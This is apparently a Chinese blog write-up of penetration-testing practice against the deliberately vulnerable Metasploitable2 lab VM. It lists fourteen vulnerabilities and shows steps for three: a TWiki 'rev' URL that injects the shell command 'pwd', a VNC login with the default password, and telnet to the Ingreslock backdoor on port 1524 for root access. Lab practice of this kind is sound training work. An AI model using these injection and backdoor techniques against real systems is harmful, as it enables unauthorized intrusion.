文章目录
- Metasploitable2靶机漏洞复现
-
- 1、TWiki 'rev' Parameter Arbitrary Command Execution
- 2、VNC Server 'password' Password
- 3、Ingreslock 后门漏洞
- 4、UnrealIRCd Backdoor(ircd)
- 5、 PHP-CGI Query String Parameter Injection Arbitrary Code Execution
- 6、Tomcat管理台默认口令漏洞
- 7、MySQL弱密码登录
- 8、PostgreSQL弱密码登录
- 9、Distcc后门漏洞
- 10、vsftpd 2.3.4 后门漏洞
- 11、Druby 远程代码执行漏洞
- 12、Samba sysmlink 默认配置目录遍历漏洞
- 13、Samba MS-RPC Shell 命令注入漏洞
- 14、Linux NFS共享目录配置漏洞
Metasploitable2靶机漏洞复现
参考大佬:
https://blog.youkuaiyun.com/Fly_hps/article/details/89763310
https://blog.youkuaiyun.com/fly_hps/article/details/89763364
环境:vmware虚拟机Metasploitable2环境
IP:192.168.72.130
1、TWiki ‘rev’ Parameter Arbitrary Command Execution
描述: rev参数可执行任意命令
验证: http://192.168.72.130/twiki/bin/view/Main/TWikiUsers?rev=2%20|pwd||echo
2、VNC Server ‘password’ Password
验证: vncviewer 192.168.72.130
Password: password
3、Ingreslock 后门漏洞
原理: Ingreslock后门程序监听1524端口,连接到1524端口就可以直接获取root权限。
端口: 1524
验证: telnet 192.168.72.130 1524